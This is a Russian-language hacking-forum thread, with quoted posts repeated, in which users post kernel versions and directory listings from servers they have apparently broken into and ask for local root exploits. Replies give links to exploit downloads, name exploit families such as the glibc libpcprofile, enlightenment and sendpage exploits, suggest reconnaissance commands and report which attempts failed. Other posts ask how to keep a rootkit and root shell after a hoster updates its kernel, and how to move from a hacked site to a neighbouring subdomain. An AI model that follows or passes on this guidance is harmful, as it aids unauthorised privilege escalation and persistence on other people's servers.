-rw-r--r--. 1 root root 1363935 Feb 11 2010 System.map-2.6.30.10-105.2.23.fc11.i586
-rw-r--r--. 1 root root 90704 Dec 10 2009 config-2.6.27.41-170.2.117.fc10.i586
-rw-r--r--. 1 root root 90902 Dec 16 2008 config-2.6.27.9-159.fc10.i586
-rw-r--r--. 1 root root 100564 Feb 11 2010 config-2.6.30.10-105.2.23.fc11.i586
drwxr-xr-x. 3 root root 4096 Jan 8 2009 efi
drwxr-xr-x. 2 root root 4096 Feb 20 2010 grub
-rw-------. 1 root root 1384473 Jan 11 2007 initrd-2.6.18-1.2798.fc6.img.old
-rw-------. 1 root root 2806096 Feb 20 2010 initrd-2.6.27.41-170.2.117.fc10.i586.img
-rw-------. 1 root root 2814217 Jan 8 2009 initrd-2.6.27.9-159.fc10.i586.img
-rw-------. 1 root root 2691924 Feb 20 2010 initrd-2.6.30.10-105.2.23.fc11.i586.img
drwx------. 2 root root 16384 Nov 10 2006 lost+found
-rwxr-xr-x. 1 root root 2579792 Dec 10 2009 vmlinuz-2.6.27.41-170.2.117.fc10.i586
-rwxr-xr-x. 1 root root 2571120 Dec 16 2008 vmlinuz-2.6.27.9-159.fc10.i586
-rwxr-xr-x. 1 root root 3200368 Feb 11 2010 vmlinuz-2.6.30.10-105.2.23.fc11.i586
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 246G 9.3G 224G 4% /
/dev/sda1 989M 38M 901M 5% /boot
/dev/sda2 337G 206G 114G 65% /home
tmpfs 1.5G 0 1.5G 0% /dev/shm
Welcome to A+ Hosting's A+ Linux
lrwxrwxrwx. 1 root root 16 Feb 20 2010 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x. 1 root root 193064 Feb 26 2009 /lib/libpcre.so.0.0.1
Есть что-то?
snake
Linux onweb.ru 2.6.30.10-105.2.23.fc11.i586 #1 SMP Thu Feb 11 06:51:26 UTC 2010 i686
Есть что-то?
Glibc
Linux xxxxxxxxx 2.6.32.21 #2 SMP Mon Aug 30 11:50:41 EDT 2010 i686
кто что может подсказать
спасибо
Linux xxxxxxxxx 2.6.32.21 #2 SMP Mon Aug 30 11:50:41 EDT 2010 i686
кто что может подсказать
спасибо
/showpost.php?p=2789862&postcount=467
/showpost.php?p=2789862&postcount=467
glibs,enlightenment не берет
glibs,enlightenment не берет
У Glibc не только libprofile, позволяет получить рута...поищи другие либы
Linux 2.6.24.2 #1 SMP Wed Feb 13 18:55:52 MSK 2008 i686
winstrool
14.08.2011, 01:39
FreeBSD 7.3-STABLE FreeBSD 7.3-STABLE #1: Sat May 1 08:27:38 EEST 2010
может кто дать скомпелированый сплоит под это?
на серваке компиляторов нет
есть вопросик.
как можно сохранить рут-шелл (руткит)
после апдейта хоста хостером
и возможно ли?
есть вопросик.
как можно сохранить рут-шелл (руткит)
после апдейта хоста хостером
и возможно ли?
ну рут шелл чаще всего используют через суидник...а он никуда не исчезает после апгрейта ядра...
ну рут шелл чаще всего используют через суидник...а он никуда не исчезает после апгрейта ядра...
дело вот в чем:
сервак был 2009 года
поставил руткит, заходил через putty без проблем
сегодня смотрю апдейт 2010 и не могу при конектится
в хакере читал что после установки руткита
и чтобы сохранить рута после апдейта
надо куда то и что то прописать (до апдейта)
не помню что и в google найти не могу,и где читал не найду
может кто сталкивался с этим?
Дабы не создавать отдельную тему, спрошу тут.
Есть доступ к админке сайта и морде.
У этого сайта на субдомене лежит еще один сайтик. Возможно ли как то подойти к нему, имея полный доступ на основном домене?
Есть что-нить для:
Линукс 2.6.16.60-0.42.9-smp
и
2.6.18-338.9.1.el5.lve0.8.32 #1 SMP Thu Apr 28 EEST 2011 x86_64
?
Есть что-нить для:
?
Показывай полный вывод команды:
uname -a
Под второй нету.
severup, вот
Linux web7 2.6.16.60-0.42.9-smp #1 SMP Thu Jan 28 23:39:37 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
severup, вот
покажи вывод команды:
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
покажи вывод команды:
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
Вот оно:
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
total 15942
138 drwxr-xr-x 3 root root 984 Apr 23 04:27 .
2 drwxr-xr-x 25 root root 632 Jul 31 11:26 ..
38169 -rw-r--r-- 1 root root 942070 May 6 2008 System.map-2.6.16.60-0.21-smp
277836 -rw-r--r-- 1 root root 945260 Jan 29 2010 System.map-2.6.16.60-0.42.9-smp
45144 -rw------- 1 root root 512 Oct 23 2009 backup_mbr
29742 lrwxrwxrwx 1 root root 1 Oct 23 2009 boot -> .
38170 -rw-r--r-- 1 root root 60952 May 6 2008 config-2.6.16.60-0.21-smp
277837 -rw-r--r-- 1 root root 60952 Jan 29 2010 config-2.6.16.60-0.42.9-smp
29743 drwxr-xr-x 2 root root 512 Feb 12 2010 grub
39958 lrwxrwxrwx 1 root root 27 Apr 23 04:27 initrd -> initrd-2.6.16.60-0.42.9-smp
45308 -rw-r--r-- 1 root root 3219653 Apr 23 04:27 initrd-2.6.16.60-0.21-smp
279641 -rw-r--r-- 1 root root 3231483 Apr 23 04:27 initrd-2.6.16.60-0.42.9-smp
45150 -rw-r--r-- 1 root root 135680 Oct 23 2009 message
38171 -rw-r--r-- 1 root root 119081 May 6 2008 symsets-2.6.16.60-0.21-smp.tar.gz
277844 -rw-r--r-- 1 root root 151642 Jan 29 2010 symsets-2.6.16.60-0.42.9-smp.tar.gz
38172 -rw-r--r-- 1 root root 338695 May 6 2008 symtypes-2.6.16.60-0.21-smp.gz
277845 -rw-r--r-- 1 root root 339079 Jan 29 2010 symtypes-2.6.16.60-0.42.9-smp.gz
38173 -rw-r--r-- 1 root root 93706 May 6 2008 symvers-2.6.16.60-0.21-smp.gz
277846 -rw-r--r-- 1 root root 93864 Jan 29 2010 symvers-2.6.16.60-0.42.9-smp.gz
38174 -rwxr-xr-x 1 root root 1784053 May 6 2008 vmlinux-2.6.16.60-0.21-smp.gz
277847 -rwxr-xr-x 1 root root 1789242 Jan 29 2010 vmlinux-2.6.16.60-0.42.9-smp.gz
39957 lrwxrwxrwx 1 root root 28 Feb 12 2010 vmlinuz -> vmlinuz-2.6.16.60-0.42.9-smp
38175 -rw-r--r-- 1 root root 1484672 May 6 2008 vmlinuz-2.6.16.60-0.21-smp
277848 -rw-r--r-- 1 root root 1488716 Jan 29 2010 vmlinuz-2.6.16.60-0.42.9-smp
14454 -rwxr-xr-x 1 root root 7497 Apr 22 2008 /lib/libpcprofile.so
14422 -rwxr-xr-x 1 root root 129557 Apr 22 2008 /lib/ld-2.4.so
14423 lrwxrwxrwx 1 root root 9 Oct 23 2009 /lib/ld-linux.so.2 -> ld-2.4.so
Вот оно:
вот это пробьёт:
http://www.multiupload.com/APXX9GISX2
Linux ser.com 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 x86_64
FreeBSD vp..net 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #0: Sun Oct 24 05:07:31 MSD 2010 root@vp.ne
Linux 2.6.18-338.9.1.el5[blablabla]ve0.8.32 #1 SMP Thu Apr 28 19:51:11 EEST 2011 x86_64
Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!
Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!
bsd попробуй эти
http://turboupload.com/56p3z11qi15f
Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!
на FreeBSD:
http://www.1337day.com/exploits/14374
А остальные без вариантов.
Да и bsd не факт, так как судя по дате Sun Oct 24 05:07:31 MSD 2010 дыры там нету... Про линукс вообще молчу, апрель и июль этого года, мне кажется, что даже в привате под них ничего нет...
Да и bsd не факт, так как судя по дате Sun Oct 24 05:07:31 MSD 2010 дыры там нету... Про линукс вообще молчу, апрель и июль этого года, мне кажется, что даже в привате под них ничего нет...
http://www.youtube.com/watch?v=H57LIcRqxlo
Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!
вот еще нашел
https://rdot.org/forum/showthread.php?t=601&page=2
А то что ядро июньское в видео это ничего?
Спасибо за отзывчивость Но к сожалению все еще ничего не сработало
Может быть с этим что нить смогу сделать?
Linux se 2.6.18-164.9.1.el5 #1 SMP Tue Dec 15 20:57:57 EST 2009 x86_64
вроде бы уже староватый))
вот эти
http://1337day.com/exploits/14333
enlightenment
sendpage
попробовал.. не сработали
Linux ****.*****.ru 2.6.32.1 #6 SMP Wed Nov 24 03:02:29 MSK 2010 x86_64
Не сработал Linux 2.6.32 local root exploit(вроде сделал все правильно)
407210 -rw-r--r-- 1 c3602 c3602 6136 Jun 8 2008 /lib/libpcprofile.so
407214 -rwxr-xr-x 1 root root 97928 Jun 8 2008 /lib/ld-2.3.6.so
407231 lrwxrwxrwx 1 c3602 c3602 11 Oct 9 2008 /lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
407202 lrwxrwxrwx 1 c3602 c3602 34 Oct 9 2008 /lib/ld-linux.so.2 -> /emul/ia32-linux/lib/ld-linux.so.2
407549 lrwxrwxrwx 1 root root 25 Sep 27 2007 /lib/ld-lsb-x86-64.so.3 -> /lib/ld-linux-x86-64.so.2
------------------------------------------------------------------------------
Linux *********** 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64
итого 18534
2 drwxr-xr-x 4 root root 3072 Авг 2 04:33 .
2 drwxr-xr-x 22 root root 4096 Май 11 15:58 ..
26 lrwxrwxrwx 1 root root 1 Янв 10 2011 boot -> .
16 -rw-r--r-- 1 root root 66892 Сен 29 2010 config-2.6.18-194.17.1.el5
29 -rw-r--r-- 1 root root 66892 Янв 6 2011 config-2.6.18-194.32.1.el5
34 -rw-r--r-- 1 root root 67215
Linux ****.*****.ru 2.6.32.1 #6 SMP Wed Nov 24 03:02:29 MSK 2010 x86_64
Не сработал Linux 2.6.32 local root exploit(вроде сделал все правильно)
407210 -rw-r--r-- 1 c3602 c3602 6136 Jun 8 2008 /lib/libpcprofile.so
407214 -rwxr-xr-x 1 root root 97928 Jun 8 2008 /lib/ld-2.3.6.so
407231 lrwxrwxrwx 1 c3602 c3602 11 Oct 9 2008 /lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
407202 lrwxrwxrwx 1 c3602 c3602 34 Oct 9 2008 /lib/ld-linux.so.2 -> /emul/ia32-linux/lib/ld-linux.so.2
407549 lrwxrwxrwx 1 root root 25 Sep 27 2007 /lib/ld-lsb-x86-64.so.3 -> /lib/ld-linux-x86-64.so.2
Glibc возьмёт 100%
По второму - без вариантов.
sevenup,
не помог. Пишет, что директория /tmp/exploit уже есть, то пишет, что папка /tmp/exploit не существует...
sevenup,
не помог. Пишет, что директория /tmp/exploit уже есть, то пишет, что папка /tmp/exploit не существует...
вот:
http://www.multiupload.com/M7GKBI3NLB
попробуй это...
P.S. не забудь файлу дать права 777 прежде чем выполнять его...
Значит пропатчено...
FreeBSD *** 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sun Feb 14 18:35:02 EET 2010 root@***:/usr/src/sys/amd64/compile/hosting amd64
Exploit от 2009 года для FreeBSD 8.0-RELEASE не взял...
total 750
141312 drwxr-xr-x 9 root wheel 1024 29 дек 2010 .
2 drwxr-xr-x 22 root wheel 1024 3 июн 22:34 ..
141334 -r--r--r-- 1 root wheel 7647 21 ноя 2009 beastie.4th
141322 -r--r--r-- 1 root wheel 8192 21 ноя 2009 boot
141320 -r--r--r-- 1 root wheel 512 21 ноя 2009 boot0
141321 -r--r--r-- 1 root wheel 512 21 ноя 2009 boot0sio
141323 -r--r--r-- 1 root wheel 512 21 ноя 2009 boot1
141324 -r--r--r-- 1 root wheel 7680 21 ноя 2009 boot2
141325 -r--r--r-- 1 root wheel 1201 21 ноя 2009 cdboot
141313 drwxr-xr-x 2 root wheel 512 21 ноя 2009 defaults
141338 -r--r--r-- 1 root wheel 703 21 ноя 2009 device.hints
141314 drwxr-xr-x 2 root wheel 512 21 ноя 2009 firmware
141333 -r--r--r-- 1 root wheel 2262 21 ноя 2009 frames.4th
141326 -r--r--r-- 1 root wheel 7535 21 ноя 2009 gptboot
141328 -r--r--r-- 1 root wheel 25219 21 ноя 2009 gptzfsboot
188418 drwxr-xr-x 2 root wheel 11776 14 фев 2010 kernel
141340 drwxr-xr-x 2 root wheel 28160 21 ноя 2009 kernel.old
165245 drwxr-xr-x 2 root wheel 11776 29 дек 2010 kernel.old1
141336 -r-xr-xr-x 1 root wheel 233472 21 ноя 2009 loader
141330 -r--r--r-- 1 root wheel 5865 21 ноя 2009 loader.4th
142456 -rw-r--r-- 1 root wheel 22 14 фев 2010 loader.conf
141329 -r--r--r-- 1 root wheel 15219 21 ноя 2009 loader.help
141335 -r--r--r-- 1 root wheel 396 21 ноя 2009 loader.rc
141318 -r--r--r-- 1 root wheel 512 21 ноя 2009 mbr
141316 drwxr-xr-x 2 root wheel 512 21 ноя 2009 modules
141319 -r--r--r-- 1 root wheel 512 21 ноя 2009 pmbr
141337 -r--r--r-- 1 root wheel 235520 21 ноя 2009 pxeboot
141332 -r--r--r-- 1 root wheel 703 21 ноя 2009 screen.4th
141331 -r--r--r-- 1 root wheel 35136 21 ноя 2009 support.4th
141317 drwxr-xr-x 2 root wheel 512 21 ноя 2009 zfs
141327 -r--r--r-- 1 root wheel 33280 21 ноя 2009 zfsboot
518175 -r--r--r-- 1 root wheel 196768 21 ноя 2009 /lib/libpcap.so.7
ls: /lib/ld*: No such file or directory
есть что нибудь
Linux icpu1521 2.6.28.8-20101130b-iscsi-ntacker-fasync-mremap-amd-sec6-grsec #1 SMP Tue Nov 30 18:27:29 CET 2010 i686 GNU/Linux
или
Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
есть что нибудь
Linux icpu1521 2.6.28.8-20101130b-iscsi-ntacker-fasync-mremap-amd-sec6-grsec #1 SMP Tue Nov 30 18:27:29 CET 2010 i686 GNU/Linux
или
Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
/thread229985.html
http://www.webhostingtalk.com/showthread.php?t=670497
http://www.hackforums.net/showthread.php?tid=658410
Expl0ited
22.08.2011, 10:36
Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
Хоть и ноябрь, но попробывать стоит: http://sota.gen.nz/compat2/robert_you_suck.c
http://seclists.org/fulldisclosure/2010/Sep/268
будьте добры, для этого есть что-нибудь?
Linux xxxxx 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot